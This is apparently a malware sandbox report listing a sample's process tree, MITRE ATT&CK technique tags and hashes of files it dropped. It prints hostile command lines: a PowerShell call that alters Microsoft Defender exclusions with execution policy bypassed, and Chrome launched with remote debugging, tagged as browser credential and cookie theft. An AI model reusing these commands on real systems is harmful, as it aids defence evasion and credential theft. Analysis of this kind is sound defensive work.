- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff9039dcf8,0x7fff9039dd04,0x7fff9039dd105⤵PID:752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2028,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2024 /prefetch:25⤵PID:4296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1924,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2108 /prefetch:115⤵PID:6000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2392,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2548 /prefetch:135⤵PID:4764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3316 /prefetch:15⤵
- Uses browser remote debugging
PID:1236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3336 /prefetch:15⤵
- Uses browser remote debugging
PID:1132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4240 /prefetch:95⤵
- Uses browser remote debugging
PID:3436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3780,i,4203278597748872447,1038679663510519725,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4724 /prefetch:15⤵
- Uses browser remote debugging
PID:3984
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"3⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3700
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5052
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:3344
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Windows Management Instrumentation
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Defense Evasion
Direct Volume Access
1Hide Artifacts
1Ignore Process Interrupts
1Indicator Removal
3File Deletion
3Modify Authentication Process
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5d1457b72c3fb323a2671125aef3eab5d
SHA15bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA2568a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0
-
Filesize
40B
MD5bd83426a5a006b0d097ace6d84bf5e11
SHA145684f5112db4d6eaeb4c0b98e95740b4217e275
SHA2561bf1428c2039a63d2026cb8d09950654432e801d1caba36f8bc55864ff825059
SHA512ed71318f822ee32bcb90bc0c4cd32fc3643ce86356d84a5a02b18e4fd054bfcf9f44426eeb1d6128723e72928f0fb1afbe9ad18488a4260fa7e44d24f83f00a4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
Filesize87B
MD5e4a639b9d8bf7a90cc97bb4e05a36753
SHA1676facdabf06e5f014e95218bfc02b8c18c39284
SHA25679da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd
SHA5124a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
3KB
MD56e2bcfaf47b332399c3fcf6774a7fe9b
SHA1e6d156eaf48764a89b6eb5e25272e704086e3ba0
SHA256e6ee1c3fa01e8d7ae631d4a934e67ee4f6ca0d15d9ab3ba756e4bffdd4194a51
SHA512dc11435dc55db67797065079c24e77fd9056f047f7fe2ce0bf9c4f80a26e93ee52edd932e08adf08fc9092c970528355061ff1ba13221fb827843c23393e0c63
-
Filesize
289B
MD5541c42f1c98b3e1b011d22eba854e707
SHA1db30188de1f22e3077e7044be1386a5d0ecaed9d
SHA2560768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b
SHA51247828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604
-
Filesize
17KB
MD51d1444a35ab945cc5cd43887689a002b
SHA1ad76adc914078bb8ff067515b9a18dc635daa59b
SHA256c72c7a0bc499b0affb5334b373edc40e956b33627d8df2fa8184278dacfc97af
SHA512aca17df89a533b901b510143f1e4ff5975161bb43a0a5ab7e996604bc53e8349db13503391b8df21798246dd40a9bd80144c977cbf27bd4b34a19b443cec7997
-
Filesize
1KB
MD5348c65af2e7832b8b500f9f1db959ded
SHA1c005fc6664c3870862b28f157b513256b8a01bda
SHA256ae57b5c76f9d937b2e623c2d4b23b927002a83d971979756e40b9620807c7f54
SHA512e2620a5e38cf33066bba203b1eabf11f68501805f394e4e8733f906f3de39e29dfb97ea0859284be94ce103291e8e5bc610e373fb5a2bd75e65c2508b4d81571
-
Filesize
44KB
MD5a453dba98e162e1a8c61b7883a45c36a
SHA142c7cb30f5b448b64ed54c1dce06b0a14484682c
SHA256501b1914978cde251053bee1de1543b7cb75bbc06d890bb2f2c2e1d89742c929
SHA512fc4ad5b0e038dbfb30c78260714ad85b1eb23345575dcd8412db8f21d7eee73b59e908977bc035bcb98286a187df59c2a7b097ed882248209aa92983c9db76a4
-
Filesize
264KB
MD5add3a9b1c7c77dc466fdd84581a2e738
SHA1268559a68f8ffb9e8bf790040b451635badba3bf
SHA2566137915ac06df1a2898ed66f974070a9b0736fc6cbc24193071fae4640edfbc3
SHA51279cfe98350f11079e3329673d76638f056a866d1ad9ba2ae5386bdf3c97b33091f1e4b393859f92709cc2b3e5210a73c892074eea80d0378751318c9b4e8ce01
-
Filesize
4.0MB
MD578918979d60e1107c3e3b9c0381d57ba
SHA1a5221dec24b540d2837cc2c68988f923ef42a723
SHA25617de248ed651849ab9da62d891a867e636c4822d887bb1189e949f9201fe9f07
SHA512c464c5b4eb96357cb7c71d37d945f217dae80e1ef70f9b79edb471abf2edb289b59720979d3a9ed6ac2620241c1e66471ed7025ad48295e85b7b05893512f593
-
Filesize
80KB
MD560e4ab20371c9caae1dfe02d61d65be4
SHA1c3a63dbedcc25a74900dbdbf0f7e5a8d7097fa28
SHA25671500f8b04cc161783164b980a5724ffe273f936c53c91a7c3a463330b1f392a
SHA5125a0b2f8f9586763de08e375127c1051f9d2a87b69321cbc6d294636edeb0948f09d432606945627b39cac62bea149c44a2f8addf3b288433da4c0fceb33363d1
-
Filesize
226B
MD54ae344179932dc8e2c6fe2079f9753ef
SHA160eacc624412b1f34809780769e3b212f138ea9c
SHA2563063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4
SHA512fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
1KB
MD534f1137282ba9d0b004c435fe5ca95ab
SHA1bf5d59871e1854a077c26a4627ae7fae1035de28
SHA25604eb31df02db6bdab1abdf7a07c0906fd4c0654e1af9e350ec4e4556b88203c0
SHA512117d8665037099921f80bb7dc94e3b4c799f16f4ee794286970041aa68935b50f3af2170d66ad0616474b0aee92e4cef02d2b88a2e0f365182e2fa9b25e9235f
-
Filesize
1KB
MD5d057703d5a9ab9259469130b501e63f4
SHA14ab7ee5f3fc41ddd9a0df6e2833dee335825db5d
SHA256a59409f996c24a5093a52a1a9deafaf674dade18bae41a6c2ef4b615870a71a9
SHA512032a463d998befa5dcd7faaf18521685a481a52bb7d79ea1a046ef0e250875f95898fcf6a1ed58e3c41ba8830d50f8da33f8e57892892b328934c056449e944a
-
Filesize
412KB
MD5bbf0af655e945e96818a7d02b80b90a4
SHA17e5a6f96fa0922c28d1168fbe787cc751628b254
SHA2562566c09283122b0f2b4aa3f318bf0d028eaed9d4651687ef2d4bf6db11d5cc92
SHA5124a15a7a696e1bd49335e533a592bf461e3154b7a9e6d54ebc03b570436576826a7b381a2a63fa462717b5ba238915857a7e7006c2f2931f1b3dd5ae5305f4bd9
-
Filesize
81B
MD5ea511fc534efd031f852fcf490b76104
SHA1573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae
-
Filesize
412KB
MD553fa4e58d53321f11ca26bf3c5422fa8
SHA1219bc77dfdccdfe10056e399876f26e94e5b67c6
SHA25695f29efe74bbfb0108c1d16a1f5f3de7fc11a67044cb025cca04dcd1bfbd0362
SHA5124e74d4a69f213f9a26160ee79372453cf6bfe38a056353e6a29a037031c0a1a80b71c8eb8707167a3752f664d80b1e1f74064c1b87d0cde5122a788c512b31aa
-
Filesize
353B
MD5d118cc3c54f632f6cdeb0a7ef0d5330d
SHA1897e910acbc99c6bee07773000b7f578585445b0
SHA256321a3a6db6c9f8f9d008da12b3adf29fc584764dba327ab0ac8116480f5e0da3
SHA512aedf6cab6fb19a11a05b300b2dfe3158e87d50aea8dd831ff0a7cea6dd5faf52eed1025c713bfa27c8287ad995f053c0cfaeba7fccfaaec7f3c841e6eea1290c
-
Filesize
4KB
MD56a6ebe968cb917b4d97c610eb4b1bad6
SHA1b537fd67dd0c289c5a76da108ac513d4fba5ec54
SHA2560c385600e6cf4b968daaa6be1cdffc77cc672a07c946e787b5da019057c1c566
SHA51204f12faa890f1f617ed267726d7eefa95453312c84bd0acbcba50eebf2309b1fc9edbbd3821fc6d9527a643517641395062fcaab8561aff0c011510d22116e40
-
Filesize
4KB
MD57ec34ba6308d1668ae109e6baf64dac4
SHA11eb8783ef219e550e3b3cd35caf1b53877d27f70
SHA2560c604c16892debf6b3e818cd934872b1d5ad56379328ac1228a4faf30b441528
SHA512054a51776b3539223aa3850490f667777876a383f269c6c6934f473787fe8283456cf18ada5c97b9cb98971c086a3a50f349253ad5dba8e9db1d83544c2fe53d
-
Filesize
2KB
MD51c935ef28fdfd394b770d945d7f04d76
SHA129e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
-
Filesize
2KB
MD57ef073b0530a5f5f0a290251115505db
SHA18ca599fc2da1e19ce1a7f2d7fde58995b6c95fb3
SHA2569ebe7f8e7e63355e8e10477bb123d8de9b87d3c495b632bcbcba36c121c1946d
SHA512bb36a77a8b4e4f901872e8c425fb0305e3b53d7501f0329a84a5dfe1ac4b73a9d780e6cd9f1acbb5471bbbb2f7f86742243daa28b8e2865fd743473486b8ad61
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
137KB
MD57605fb5c749eeea0b1b27fdaad78051c
SHA128388bf016af085bbcbacf8c516853942f6ec8d3
SHA256466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA5121a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54
-
Filesize
211KB
MD5b6054dbe4ed853c2e35291f045a632ba
SHA11355fbe1ea1f6bb566921f04512f78590c4b0e41
SHA256b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4
SHA512648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0
-
Filesize
780B
MD560d646f40556d78166ad8111d850fc51
SHA1babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA5123fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6